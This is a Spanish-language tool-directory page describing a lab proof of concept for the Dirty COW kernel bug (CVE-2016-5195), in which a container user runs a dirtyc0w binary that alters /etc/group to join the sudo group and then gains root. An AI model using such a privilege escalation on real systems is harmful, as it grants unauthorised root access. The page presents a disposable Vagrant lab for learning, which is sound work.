Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Dirty-COW-CVE-2016-5195- — Explota la vulnerabilidad dirtycow para iniciar sesión como root | Kitploit
Herramientas/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónEscape de ContenedoresLabs y Práctica
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

Explota la vulnerabilidad dirtycow para iniciar sesión como root

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 5 añosAún no revisado

Dirtyc0w Docker POC

Requisitos previos:

  • Vagrant instalado

Cómo usar

Primero clona el proyecto git clone https://github.com/BrolyCode/Dirty-Cow.git Entra en la carpeta cd Dirty-Cow Luego levanta el entorno con el comando

root@kitploit:~
vagrant up

Una vez que el servidor esté construido, nos conectaremos por ssh

root@kitploit:~
vagrant ssh

cambia al usuario root

root@kitploit:~
sudo -i

Ahora podemos iniciar sesión como el hacker

root@kitploit:~
docker exec -it -u hacker nginx bash

En el directorio donde hemos iniciado sesión tenemos los siguientes archivos

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

Si hacemos cat del archivo /etc/group vemos

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

Podemos intentar iniciar sesión como root

root@kitploit:~
sudo -i

Pero el sistema se negará, porque no tenemos derecho de acceso. Ahora explotaremos el fallo en /etc/group

root@kitploit:~
./dirtyc0w 

Imprimirá lo siguiente en la terminal; debemos esperar un poco de tiempo (2/3 minutos).

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

Luego haremos cat de /etc/group de nuevo

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

Iniciar sesión como root

root@kitploit:~
sudo -i

root@27862a2f9973:~#

Limpieza

Vuelve a la terminal de tu máquina anfitriona y ejecuta vagrant destroy

Descargar herramienta